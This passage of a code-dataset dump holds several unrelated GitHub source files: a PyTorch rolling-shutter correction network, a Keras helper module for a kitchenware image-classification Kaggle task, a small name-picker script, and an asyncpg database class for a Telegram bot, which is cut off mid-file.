1, 0)\n\n def _mul_encoding(self, flows, encodings):\n n, c, h, w = flows.shape\n assert encodings.shape == (n, int(c / 2), h, w), '{} != {}'.format(encodings.shape, (n, int(c / 2), h, w))\n flows = flows.reshape(n, int(c / 2), 2, h, w)\n encodings = encodings.reshape(n, int(c / 2), 1, h, w)\n flows *= encodings\n flows = flows.reshape(n, c, h, w)\n return flows\n\n def forward(self, x, encoding, return_velocity=False):\n x_t2b, x_b2t = torch.chunk(x, chunks=2, dim=1) # (n, 3, h, w)\n encoding_ds = F.interpolate(encoding, scale_factor=0.5, mode='bilinear', align_corners=False,\n recompute_scale_factor=False)\n\n flow0 = self.block0(torch.cat((x, encoding), dim=1)) # h/2,w/2\n F1 = flow0\n F1 = self._mul_encoding(F1, encoding_ds)\n F1 = self.conv0(F1)\n F1_large = F.interpolate(F1, scale_factor=2.0, mode=\"bilinear\", align_corners=False,\n recompute_scale_factor=False) * 2.0\n\n warped_t2b_imgs = multi_warp(x_t2b, F1_large[:, :2 * self.num_flows])\n warped_b2t_imgs = multi_warp(x_b2t, F1_large[:, 2 * self.num_flows:])\n warped_imgs = torch.cat((warped_t2b_imgs, warped_b2t_imgs), dim=1) # (n, 2*num_flows*3, h, w)\n flow1 = self.block1(torch.cat((warped_imgs, encoding, F1_large), dim=1)) # h/2,w/2\n F2 = (flow0 + flow1)\n F2 = self._mul_encoding(F2, encoding_ds)\n F2 = self.conv1(F2)\n F2_large = F.interpolate(F2, scale_factor=2.0, mode=\"bilinear\", align_corners=False,\n recompute_scale_factor=False) * 2.0\n\n warped_t2b_imgs = multi_warp(x_t2b, F2_large[:, :2 * self.num_flows])\n warped_b2t_imgs = multi_warp(x_b2t, F2_large[:, 2 * self.num_flows:])\n warped_imgs = torch.cat((warped_t2b_imgs, warped_b2t_imgs), dim=1) # (n, 2*num_flows*3, h, w)\n flow2 = self.block2(torch.cat((warped_imgs, encoding, F2_large), dim=1)) ## h/2,w/2\n F3 = (flow0 + flow1 + flow2)\n F3 = self._mul_encoding(F3, encoding_ds)\n F3 = self.conv2(F3)\n F3_large = F.interpolate(F3, scale_factor=2.0, mode=\"bilinear\", align_corners=False,\n recompute_scale_factor=False) * 2.0\n\n warped_t2b_imgs = multi_warp(x_t2b, F3_large[:, :2 * self.num_flows])\n warped_b2t_imgs = multi_warp(x_b2t, F3_large[:, 2 * self.num_flows:])\n warped_imgs = torch.cat((warped_t2b_imgs, warped_b2t_imgs), dim=1) # (n, 2*num_flows*3, h, w)\n flow3 = self.block3(torch.cat((warped_imgs, encoding, F3_large), dim=1)) ## h/2,w/2\n F4 = (flow0 + flow1 + flow2 + flow3)\n F4 = self._mul_encoding(F4, encoding_ds)\n F4 = 
self.conv3(F4)\n\n if return_velocity:\n return F4, [F1, F2, F3, F4], flow0 + flow1 + flow2 + flow3\n return F4, [F1, F2, F3, F4]\n\n\nclass ConvDS(nn.Module):\n def __init__(self, in_planes, out_planes, stride=2):\n super(ConvDS, self).__init__()\n self.conv1 = conv(in_planes, out_planes, 3, stride, 1)\n self.conv2 = conv(out_planes, out_planes, 3, 1, 1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass WarpedContextNet(nn.Module):\n def __init__(self, c=16, num_flows=3):\n super(WarpedContextNet, self).__init__()\n self.num_flows = num_flows\n self.conv0_0 = ConvDS(3, c)\n self.conv1_0 = ConvDS(c, c)\n self.conv1_1 = conv(num_flows * c, c, kernel_size=1, padding=0, stride=1)\n self.conv2_0 = ConvDS(c, 2 * c)\n self.conv2_1 = conv(num_flows * (2 * c), 2 * c, kernel_size=1, padding=0, stride=1)\n self.conv3_0 = ConvDS(2 * c, 4 * c)\n self.conv3_1 = conv(num_flows * (4 * c), 4 * c, kernel_size=1, padding=0, stride=1)\n self.conv4_0 = ConvDS(4 * c, 8 * c)\n self.conv4_1 = conv(num_flows * (8 * c), 8 * c, kernel_size=1, padding=0, stride=1)\n\n def forward(self, x, flow):\n x = self.conv0_0(x)\n x = self.conv1_0(x)\n flow = F.interpolate(flow, scale_factor=0.5, mode=\"bilinear\", align_corners=False) * 0.5\n f1 = multi_warp(x, flow)\n f1 = self.conv1_1(f1)\n\n x = self.conv2_0(x)\n flow = F.interpolate(flow, scale_factor=0.5, mode=\"bilinear\", align_corners=False) * 0.5\n f2 = multi_warp(x, flow)\n f2 = self.conv2_1(f2)\n\n x = self.conv3_0(x)\n flow = F.interpolate(flow, scale_factor=0.5, mode=\"bilinear\", align_corners=False) * 0.5\n f3 = multi_warp(x, flow)\n f3 = self.conv3_1(f3)\n\n x = self.conv4_0(x)\n flow = F.interpolate(flow, scale_factor=0.5, mode=\"bilinear\", align_corners=False) * 0.5\n f4 = multi_warp(x, flow)\n f4 = self.conv4_1(f4)\n return [f1, f2, f3, f4]\n\n\nclass IFEDNet(nn.Module):\n def __init__(self, c=16, num_flows=3):\n self.num_flows = num_flows\n super(IFEDNet, self).__init__()\n self.conv0 = ConvDS(2 * (3 + 2) * num_flows, c)\n self.down0 = ConvDS(c, 2 * c)\n self.down1 = ConvDS(4 * c, 4 * c) # +2c\n self.down2 = ConvDS(8 * c, 8 * c) # +4c\n self.down3 = ConvDS(16 * c, 16 * c) # +8c\n self.up0 = deconv(32 * c, 8 * c) # +16c\n self.up1 = deconv(16 * c, 4 * c)\n self.up2 = deconv(8 * c, 2 * c)\n self.up3 = deconv(4 * c, c)\n self.conv1 = deconv(c, 4 * num_flows, 4, 2, 1)\n\n def forward(self, img_t2b, img_b2t, flow_t2b, flow_b2t, c_t2b, c_b2t):\n warped_t2b_imgs = multi_warp(img_t2b, flow_t2b) # (n, num_flows*3, h, w)\n warped_b2t_imgs = multi_warp(img_b2t, flow_b2t) # (n, num_flows*3, h, w)\n\n d0 = self.conv0(torch.cat((warped_t2b_imgs, warped_b2t_imgs, flow_t2b, flow_b2t), dim=1))\n d0 = self.down0(d0)\n d1 = self.down1(torch.cat((d0, c_t2b[0], c_b2t[0]), dim=1))\n d2 = self.down2(torch.cat((d1, c_t2b[1], c_b2t[1]), dim=1))\n d3 = self.down3(torch.cat((d2, c_t2b[2], c_b2t[2]), dim=1))\n out = self.up0(torch.cat((d3, c_t2b[3], c_b2t[3]), dim=1))\n out = self.up1(torch.cat((out, d2), dim=1))\n out = self.up2(torch.cat((out, d1), dim=1))\n out = self.up3(torch.cat((out, d0), dim=1))\n out = self.conv1(out)\n\n res = torch.sigmoid(out[:, :3 * self.num_flows]) * 2 - 1\n mask = torch.sigmoid(out[:, 3 * self.num_flows:]) # (n, 3, h, w)\n n, c, h, w = warped_t2b_imgs.shape\n warped_t2b_imgs = warped_t2b_imgs.reshape(n, self.num_flows, 3, h, w)\n warped_b2t_imgs = warped_b2t_imgs.reshape(n, self.num_flows, 3, h, w)\n mask = mask.reshape(n, self.num_flows, 1, h, w)\n warped_imgs = mask * warped_t2b_imgs + (1. 
- mask) * warped_b2t_imgs\n warped_imgs = warped_imgs.reshape(n, self.num_flows * 3, h, w)\n pred = warped_imgs + res\n pred = torch.clamp(pred, 0, 1)\n\n return pred\n\n\n\nclass RSG(nn.Module):\n def __init__(self, num_frames, n_feats, load_flow_net, flow_pretrain_fn):\n super(RSG, self).__init__()\n self.flow_net = FlowNetMulCatFusion(num_flows=num_frames)\n self.warped_context_net = WarpedContextNet(c=n_feats, num_flows=num_frames)\n self.ife_net = IFEDNet(c=n_feats, num_flows=num_frames)\n\n def forward(self, x, encoding, return_velocity=False):\n x_t2b, x_b2t = x[:, 0], x[:, 1]\n x = torch.cat((x_t2b, x_b2t), dim=1)\n if return_velocity:\n flow, flows, velocity = self.flow_net(x, encoding, return_velocity)\n else:\n flow, flows = self.flow_net(x, encoding) ## h/2,w/2\n flow_t2b, flow_b2t = torch.chunk(flow, chunks=2, dim=1)\n c_t2b = self.warped_context_net(x_t2b, flow_t2b)\n c_b2t = self.warped_context_net(x_b2t, flow_b2t)\n flow_t2b = F.interpolate(flow_t2b, scale_factor=2.0, mode=\"bilinear\", align_corners=False) * 2.0 # h,w\n flow_b2t = F.interpolate(flow_b2t, scale_factor=2.0, mode=\"bilinear\", align_corners=False) * 2.0\n out = self.ife_net(x_t2b, x_b2t, flow_t2b, flow_b2t, c_t2b, c_b2t)\n\n if return_velocity:\n return out, flows, velocity\n return out, flows\n\n\n\ndef cost_profile(model, H, W, seq_length, ext_frames):\n x = torch.randn(1, 6 * seq_length, H, W).cuda()\n x = pad(x)\n encodings = torch.randn(1, 2 * ext_frames, H, W).cuda()\n encodings = pad(encodings)\n flops, params = profile(model, inputs=(x, encodings), verbose=False)\n\n return flops, params\n\n#\n# if __name__ == '__main__':\n# from para import Parameter\n#\n# args = Parameter().args\n# inputs = torch.randn(4, 18, 256, 256).cuda()\n# encodings = torch.randn(4, 6, 256, 256).cuda()\n# model = Model(args).cuda()\n# outputs, flows = model(inputs, encodings)\n# print(outputs.shape)\n# for flow in flows:\n# print(flow.shape)\n\n","repo_name":"shangwei5/SelfDRSC","sub_path":"models/network_srsc_rsg.py","file_name":"network_srsc_rsg.py","file_ext":"py","file_size_in_byte":14350,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"72821671433","text":"import json\nfrom datetime import datetime\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nimport numpy as np\nimport pandas as pd\nimport PIL\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.callbacks import History\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, load_img\n\n\ndef plot_thumbnails(image_paths: list[str], n_cols: int = 10) -> None:\n \"\"\"\n Plots squared thumbnails in a grid.\n \n :param list[str] image_paths: Paths to the images. 
All images are plotted.\n :param int n_cols: Number of columns in preview (optional)\n \"\"\"\n\n # prevent numbers smaller than one\n n_cols = max(1, n_cols)\n n: int = len(image_paths)\n n_rows = n // n_cols\n\n fig = plt.figure(figsize=(n_cols*2, n_rows*2))\n fig.patch.set_alpha(0.0)\n\n for i in range(n):\n im = PIL.Image.open(image_paths[i])\n #im = square_img(im)\n ax = plt.subplot(n_rows, n_cols, i+1)\n plt.imshow(im)\n ax.spines['bottom'].set_color('grey')\n ax.spines['top'].set_color('grey') \n ax.spines['right'].set_color('grey')\n ax.spines['left'].set_color('grey')\n\n # remove the x and y ticks\n plt.setp(plt.gcf().get_axes(), xticks=[], yticks=[])\n\n # set the spacing between subplots\n plt.subplots_adjust(\n wspace=0.1,\n hspace=0.1\n )\n\n # show the figure\n plt.show()\n\n\ndef plot_thumbnails_for_label(df: pd.DataFrame, label: str, n: int = 30, n_cols: int = 10) -> None:\n \"\"\"\n Plots squared thumbnails in a grid.\n \n :param pd.DataFrame df: Dataframe with columns \"label\" and \"filename\"\n :param str label: Label, for which images should be plotted\n :param int n: Number of images in preview (optional)\n :param int n_cols: Number of columns in preview (optional)\n \"\"\"\n\n image_paths: list[str] = df.loc[df['label'] == label, 'filename'].iloc[:n].tolist()\n\n plot_thumbnails(\n image_paths=image_paths, \n n_cols=n_cols\n )\n\n\ndef square_img(im: PIL.Image) -> PIL.Image:\n \"\"\"\n Square image by retaining the shorter dimension and\n cropping the longer dimension centered.\n \n :param PIL.Image im: An image object\n \"\"\"\n\n # get x and y dimensions of image size in pixels\n img_size: tuple[int, int] = im.size\n x, y = img_size\n\n # calculate offset for squared crop\n size: int = min(x, y)\n x_offset: int = round((x - size) / 2)\n y_offset: int = round((y - size) / 2)\n\n # crop and return image\n return im.crop(box=(x_offset, y_offset, x-x_offset, y-y_offset))\n\n\ndef predict_test_set(model: Model, image_size: tuple[int], labels: list[str], path: str = 'data/test.csv', evaluate: bool = False) -> pd.DataFrame:\n \"\"\"Use model to predict on test data set.\n \n :param keras.Model model: A trained keras model object.\n :param tuple[int] image_size: Tuple with height and width of images, the data was trained on.\n :param list[str] labels: List with labels in the order, the model was trained on.\n :param str path: Path to the DataFrame with the test data.\n :param bool evaluate: (optional) If True model will only predict on data, for which a label exists in the test data. \n Default is False and prediction will be performed on the full test dataset. 
\n\n Returns a DataFrame with the prediction for each test image.\n \"\"\"\n\n # load csv with test data\n df_test = pd.read_csv(path, dtype={'Id': str})\n df_test['filename'] = 'data/images/' + df_test['Id'] + '.jpg'\n\n # load only labeled test data in evaluation mode\n # but for submission all test observations need to be predicted\n if evaluate and 'label' in df_test.columns:\n df_test = df_test[~df_test['label'].isna()]\n \n # create data generator\n test_datagen = ImageDataGenerator()\n test_generator = test_datagen.flow_from_dataframe(\n df_test,\n x_col='filename',\n class_mode='input',\n target_size=image_size,\n batch_size=32,\n shuffle=False\n )\n\n # predict\n y_pred = model.predict(test_generator)\n\n classes = np.array(labels)\n predictions = classes[y_pred.argmax(axis=1)]\n\n df_test['pred'] = predictions\n\n if evaluate:\n df_test['correct'] = df_test['pred'] == df_test['label']\n print(f\"Prediction accuracy: {df_test['correct'].mean()*100:.2f}%.\")\n\n return df_test\n\n\ndef print_false_preds(df_test: pd.DataFrame) -> None:\n \"\"\"Plots twelve randomly selected falsely predicted images with predicted and actual label.\n \n :param pd.DataFrame df_test: A DataFrame with predictions.\n \"\"\"\n\n plt.figure(figsize=(10,7))\n\n for idx, row in df_test[~df_test['correct']].sample(frac=1).reset_index(drop=True)[:12].iterrows():\n im = PIL.Image.open(row['filename'])\n plt.subplot(3, 4, idx+1)\n plt.imshow(im)\n plt.axis('off')\n plt.title(f\"{row['Id']} - {row['pred']}/{row['label']}\")\n plt.show()\n\n\ndef prepare_kaggle_submission(df_test: pd.DataFrame) -> None:\n \"\"\"Saves a submission.csv file for Kaggle from the Dataframe with predictions.\n \n :param pd.DataFrame df_test: A DataFrame with predictions.\n \"\"\"\n\n if df_test.shape[0] != 3808:\n print(f\"Warning: Dataset with 3808 rows expected, but got {df_test.shape[0]} rows instead.\")\n\n df_submission = df_test.drop(['label'], axis='columns').rename(columns={'pred': 'label'})\n df_submission[['Id', 'label']].to_csv('submission.csv', index=False)\n\n\ndef track_experiment(keras_history: History, architecture: str, version: int, hyper_params: dict, labels: list[str], start_epoch: int=1) -> pd.DataFrame:\n \"\"\"Saves training performance in a central csv file.\n \n :param keras.callbacks.History keras_history: A keras history object.\n :param str architecture: Name of the used model architecture for labeling the training.\n :param int version: A number for the training.\n :param dict hyper_params: Used hyper parameters for the training.\n :param list[str] labels: List with labels in the order, the model was trained for.\n :param int start_epoch: Epoch, when the history was started. Default is 1, could be changed when training was resumed.\n\n Returns a DataFrame with all input data.\n \"\"\"\n\n df_history = pd.DataFrame(keras_history.history)\n df_history['architecture'] = architecture\n df_history['epoch'] = list(range(start_epoch, len(keras_history.history['loss']) + start_epoch))\n df_history['version'] = version\n df_history['params'] = json.dumps(hyper_params)\n df_history['labels'] = json.dumps(labels)\n df_history['timestamp'] = datetime.now()\n\n save_history(df_history)\n\n return df_history\n\n\ndef save_history(df: pd.DataFrame, path: str='models/train_history.csv') -> None:\n \"\"\"Appends training history to a central csv file.\n \n :param pd.DataFrame df: A DataFrame, which will be appended to the central csv file.\n :param str path: Location of the central csv file. 
(optional)\n \"\"\"\n\n with open(path, mode='a', newline='') as f:\n df.to_csv(f, mode='a', header=f.tell()==0, index=False)\n\n\ndef load_history(path: str='models/train_history.csv') -> pd.DataFrame:\n \"\"\"Loads all tracked training histories from a central csv file.\n \n :param str path: Location of the central csv file. (optional)\n\n Returns a DataFrame with all training histories which were tracked.\n \"\"\"\n\n return pd.read_csv(path)\n\n\ndef load_history_version(version: int) -> pd.DataFrame:\n \"\"\"Loads the tracked training history for a specific training session from a central csv file.\n \n :param int version: Number of the training session.\n\n Returns a DataFrame with the full training history for the specified session.\n \"\"\"\n\n df = load_history()\n\n # filter for specific version in history\n df = df[df['version'] == version]\n\n return df\n\n\ndef get_params_for_version(version: int) -> dict:\n \"\"\"Gets the used training parameters for a specific training session.\n \n :param int version: Number of the training session.\n\n Returns a dictionary with the used training parameters for the specified session.\n \"\"\"\n\n df = load_history_version(version=version)\n params = df['params'].iloc[0]\n return json.loads(params)\n\n\ndef get_labels_for_version(version: int) -> list[str]:\n \"\"\"Gets the used labels for a specific training session.\n \n :param int version: Number of the training session.\n\n Returns a list with the used labels for the specified training session.\n \"\"\"\n\n df = load_history_version(version=version)\n labels = df['labels'].iloc[0]\n return json.loads(labels)\n\n\ndef get_latest_version() -> int:\n \"\"\"Returns highest version number from the central csv file with tracked training histories.\n\n Returns an integer with the number; returns 0 if none was found.
\n \"\"\"\n\n try: \n return load_history()['version'].max()\n\n except Exception as err:\n return 0\n\n\ndef plot_accuracy_for_training_history(df: pd.DataFrame) -> None:\n \"\"\"Plots training and validation accuracy per epoch.\n \n :param pd.DataFrame df: History of the training cycle.\n \"\"\"\n\n #df = df.reset_index()\n\n fig = plt.figure(figsize=(10, 3))\n ax = plt.axes()\n\n plt.plot(df['epoch'], df['accuracy'], label='training')\n plt.plot(df['epoch'], df['val_accuracy'], label='validation')\n\n plt.xlabel('epochs')\n ax.xaxis.set_major_locator(MultipleLocator(5))\n ax.xaxis.set_major_formatter('{x:.0f}')\n ax.xaxis.set_minor_locator(MultipleLocator(1))\n\n plt.ylabel('accuracy')\n\n plt.title(f\"Training: {df['version'].iloc[0]:d} - Architecture: {df['architecture'].iloc[0]:s}\")\n\n plt.legend()\n \n plt.show()\n\n\ndef plot_accuracy_for_version(version: int) -> None:\n \"\"\"Plots training and validation accuracy per epoch.\n \n :param int version: Version number of the training cycle.\n \"\"\"\n\n df = load_history_version(version=version)\n\n plot_accuracy_for_training_history(df)\n\n\ndef plot_multiple_versions(versions: list[int], titles: list[str] = None, y_lim: tuple[float] = None) -> None:\n \"\"\"Plots training and validation accuracy for multiple versions.\n \n :param list[int] versions: List of version numbers for training cycles.\n \"\"\"\n\n df = load_history()\n\n fig, ax = plt.subplots(1, len(versions), sharex='col', sharey='row', figsize=(10, 5))\n\n if titles is None or len(versions) != len(titles):\n titles = [None] * len(versions)\n\n for idx, (version, title) in enumerate(zip(versions, titles)):\n\n df_v = df[df['version'] == version]\n\n ax[idx].plot(df_v['epoch'], df_v['accuracy'], label=('training'))\n ax[idx].plot(df_v['epoch'], df_v['val_accuracy'], label=('validation'))\n ax[idx].set_title(f\"Training: {version:d} {chr(10) + str(title) if title is not None else ''}\")\n\n if y_lim is not None:\n ax[idx].set_ylim(y_lim)\n\n plt.legend()\n plt.tight_layout()\n plt.show()","repo_name":"LoHertel/lost-in-cupboard","sub_path":"src/kitchenware_helper.py","file_name":"kitchenware_helper.py","file_ext":"py","file_size_in_byte":10922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73479718791","text":"import random\ndef allNames():\n names_list = []\n with open(\"names.txt\", encoding=\"utf-8\") as file:\n for i in file:\n names_list.append(i[:3])\n return names_list\n\nprint(\"=========== Name Picker System =========\\n\\n\")\n\nwhile True:\n names_list = allNames()\n first_name = input(\"Enter your surname: \")\n count = int(input(\"Enter how many names you want: \"))\n random_names = random.choices(names_list, k= count) # randomly pick count names\n for i in random_names:\n print(first_name + i[-2:])\n\n again = input(\"Do you want to continue? (y, n) \")
(y , n)\")\n if again.lower() == \"n\":\n break\n\nprint(\"系統結束\")\n","repo_name":"Lainie888/2023_07_27","sub_path":"lesson10_2.py","file_name":"lesson10_2.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"921739798","text":"from typing import Union\n\nimport asyncpg\nfrom asyncpg import Connection\nfrom asyncpg.pool import Pool\n\nfrom data import config\n\n\nclass Database:\n\n def __init__(self):\n self.pool: Union[Pool, None] = None\n\n async def create(self):\n self.pool = await asyncpg.create_pool(\n user=config.DB_USER,\n password=config.DB_PASS,\n host=config.DB_HOST,\n database=config.DB_NAME\n )\n\n async def execute(self, command, *args,\n fetch: bool = False,\n fetchval: bool = False,\n fetchrow: bool = False,\n execute: bool = False\n ):\n async with self.pool.acquire() as connection:\n connection: Connection\n async with connection.transaction():\n if fetch:\n result = await connection.fetch(command, *args)\n elif fetchval:\n result = await connection.fetchval(command, *args)\n elif fetchrow:\n result = await connection.fetchrow(command, *args)\n elif execute:\n result = await connection.execute(command, *args)\n return result\n\n async def create_table_users(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS Users (\n id SERIAL PRIMARY KEY,\n full_name VARCHAR(255) NOT NULL,\n username varchar(255) NULL,\n phone varchar(55),\n score INT DEFAULT 0,\n oldd INT DEFAULT 0,\n telegram_id BIGINT NOT NULL UNIQUE,\n user_args varchar(55) NULL\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_chanel(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS Channel (\n id SERIAL PRIMARY KEY,\n chanelll VARCHAR(301) NOT NULL,\n url varchar(301) NOT NULL,\n channel_name TEXT NULL\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_admins(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS admins (\n id SERIAL PRIMARY KEY,\n telegram_id BIGINT NOT NULL UNIQUE\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_chanel_element(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS Elementt (\n id SERIAL PRIMARY KEY,\n photo TEXT NULL,\n gifts TEXT NULL,\n game_text TEXT NULL,\n shartlar TEXT NULL,\n min_salary INT DEFAULT 1,\n one_child INT DEFAULT 1,\n two_children INT DEFAULT 1,\n three_children INT DEFAULT 1,\n first_min INT DEFAULT 1,\n second_min INT DEFAULT 1,\n three_min INT DEFAULT 1,\n limit_require INT DEFAULT 5,\n winners INT DEFAULT 20,\n bot_url varchar(255)\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_buttons(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS buttons (\n id SERIAL PRIMARY KEY,\n button_name VARCHAR(301) NOT NULL\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_lessons(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS lessons (\n id SERIAL PRIMARY KEY,\n button_name VARCHAR(301) NOT NULL,\n type VARCHAR(301) NOT NULL,\n file_id VARCHAR(301) NULL,\n file_unique_id VARCHAR(301) NOT NULL,\n description TEXT NULL \n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n @staticmethod\n def format_args(sql, parameters: dict):\n sql += \" AND \".join([\n f\"{item} = ${num}\" for num, item in enumerate(parameters.keys(),\n start=1)\n ])\n return sql, tuple(parameters.values())\n\n async def add_user(self, full_name, telegram_id, username):\n sql = \"INSERT INTO users (full_name, telegram_id, username) VALUES($1, $2, $3) 
returning *\"\n return await self.execute(sql, full_name, telegram_id, username, fetchrow=True)\n\n async def add_userrr(self, full_name, telegram_id, username, phone, score):\n sql = \"INSERT INTO users (full_name, telegram_id, username, phone, score) VALUES($1, $2, $3, $4, $5) returning *\"\n return await self.execute(sql, full_name, telegram_id, username, phone, score, fetchrow=True)\n\n async def add_userr(self, full_name, telegram_id, username, score):\n sql = \"INSERT INTO users (full_name, telegram_id, username, score) VALUES($1, $2, $3,$4) returning *\"\n return await self.execute(sql, full_name, telegram_id, username, score, fetchrow=True)\n\n async def add_lesson_text(self, button_name, type, file_unique_id, description):\n sql = \"INSERT INTO lessons (button_name,type,file_unique_id,description) VALUES($1,$2,$3,$4) returning *\"\n return await self.execute(sql, button_name, type, file_unique_id, description, fetchrow=True)\n\n async def add_json_file_user(self, full_name, username, phone, telegram_id, score):\n sql = \"INSERT INTO users (full_name, username, phone, telegram_id, score) VALUES($1, $2, $3,$4,$5) returning *\"\n return await self.execute(sql, full_name, username, phone, telegram_id, score, fetchrow=True)\n\n async def select_all_users(self):\n sql = \"SELECT * FROM Users\"\n return await self.execute(sql, fetch=True)\n\n async def select_user(self, **kwargs):\n sql = \"SELECT * FROM Users WHERE \"\n sql, parameters = self.format_args(sql, parameters=kwargs)\n return await self.execute(sql, *parameters, fetchrow=True)\n\n async def select_top_users(self, lim_win):\n sql = f\"SELECT * FROM Users WHERE score IS NOT NULL ORDER BY score DESC LIMIT {lim_win}\"\n return await self.execute(sql, fetch=True)\n\n async def select_top_users_list(self):\n sql = f\"SELECT * FROM Users WHERE score IS NOT NULL ORDER BY score DESC\"\n return await self.execute(sql, fetch=True)\n\n async def count_users(self):\n sql = \"SELECT COUNT(*) FROM Users\"\n return await self.execute(sql, fetchval=True)\n\n async def update_user_name(self, name, telegram_id):\n sql = \"UPDATE Users SET full_name=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, name, telegram_id, execute=True)\n\n async def update_user_username(self, username, telegram_id):\n sql = \"UPDATE Users SET username=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, username, telegram_id, execute=True)\n\n async def update_user_oldd(self, oldd, telegram_id):\n sql = \"UPDATE Users SET oldd=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, oldd, telegram_id, execute=True)\n\n async def update_user_args(self, user_args, telegram_id):\n sql = \"UPDATE Users SET user_args=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, user_args, telegram_id, execute=True)\n\n async def update_user_phone(self, phone, telegram_id):\n sql = \"UPDATE Users SET phone=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, phone, telegram_id, execute=True)\n\n async def update_user_score(self, score, telegram_id):\n sql = \"UPDATE Users SET score=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, score, telegram_id, execute=True)\n\n async def update_users_all_score(self):\n sql = \"UPDATE Users SET score=0\"\n return await self.execute(sql, execute=True)\n\n async def delete_users(self, telegram_id):\n sql = \"DELETE FROM Users WHERE telegram_id=$1\"\n await self.execute(sql, telegram_id, execute=True)\n\n async def delete_admin(self, admin_id):\n sql = \"DELETE FROM admins WHERE admin_id=$1\"\n await 
self.execute(sql, admin_id, execute=True)\n\n async def drop_users(self):\n await self.execute(\"DROP TABLE Users\", execute=True)\n\n async def delete_channel(self, chanel):\n sql = \"DELETE FROM Channel WHERE chanelll=$1\"\n await self.execute(sql, chanel, execute=True)\n\n async def select_chanel(self):\n sql = \"SELECT * FROM Channel\"\n return await self.execute(sql, fetch=True)\n\n async def add_chanell(self, chanelll, url, channel_name):\n sql = \"INSERT INTO Channel (chanelll, url,channel_name) VALUES($1, $2,$3) returning *\"\n return await self.execute(sql, chanelll, url, channel_name, fetchrow=True)\n\n async def get_chanel(self, channel):\n sql = f\"SELECT * FROM Channel WHERE chanelll=$1\"\n return await self.execute(sql, channel, fetch=True)\n\n async def get_admins(self):\n sql = f\"SELECT * FROM admins\"\n return await self.execute(sql, fetch=True)\n\n async def drop_Chanel(self):\n await self.execute(\"DROP TABLE Channel\", execute=True)\n\n async def delete_channel(self, chanel):\n sql = \"DELETE FROM Channel WHERE chanelll=$1\"\n await self.execute(sql, chanel, execute=True)\n\n async def select_chanel(self):\n sql = \"SELECT * FROM Channel\"\n return await self.execute(sql, fetch=True)\n\n async def add_photo(self, photo):\n sql = \"INSERT INTO Elementt (photo) VALUES($1) returning *\"\n return await self.execute(sql, photo, fetchrow=True)\n\n async def add_gift(self, gift):\n sql = \"INSERT INTO Elementt (gifts) VALUES($1) returning *\"\n return await self.execute(sql, gift, fetchrow=True)\n\n async def add_shartlar(self, shartlar):\n sql = \"INSERT INTO Elementt (shartlar) VALUES($1) returning *\"\n return await self.execute(sql, shartlar, fetchrow=True)\n\n async def add_text(self, bot_url):\n sql = \"INSERT INTO Elementt (bot_url) VALUES($1) returning *\"\n return await self.execute(sql, bot_url, fetchrow=True)\n\n async def add_bot_url(self, bot_url):\n sql = \"INSERT INTO Elementt (bot_url) VALUES($1) returning *\"\n return await self.execute(sql, bot_url, fetchrow=True)\n\n async def update_photo(self, photo):\n sql = \"UPDATE Elementt SET photo=$1 WHERE id=1\"\n return await self.execute(sql, photo, execute=True)\n\n async def update_limit_score(self, limit_score):\n sql = \"UPDATE Elementt SET limit_score=$1 WHERE id=1\"\n return await self.execute(sql, limit_score, execute=True)\n\n async def update_min_salary(self, min_salary):\n sql = \"UPDATE Elementt SET min_salary=$1 WHERE id=1\"\n return await self.execute(sql, min_salary, execute=True)\n\n async def update_first_min(self, first_min):\n sql = \"UPDATE Elementt SET first_min=$1 WHERE id=1\"\n return await self.execute(sql, first_min, execute=True)\n\n async def update_second_min(self, second_min):\n sql = \"UPDATE Elementt SET second_min=$1 WHERE id=1\"\n return await self.execute(sql, second_min, execute=True)\n\n async def update_three_min(self, three_min):\n sql = \"UPDATE Elementt SET three_min=$1 WHERE id=1\"\n return await self.execute(sql, three_min, execute=True)\n\n async def update_one_child(self, one_child):\n sql = \"UPDATE Elementt SET one_child=$1 WHERE id=1\"\n return await self.execute(sql, one_child, execute=True)\n\n async def update_two_children(self, two_children):\n sql = \"UPDATE Elementt SET two_children=$1 WHERE id=1\"\n return await self.execute(sql, two_children, execute=True)\n\n async def update_three_children(self, three_children):\n sql = \"UPDATE Elementt SET three_children=$1 WHERE id=1\"\n return await self.execute(sql, three_children, execute=True)\n\n async def 
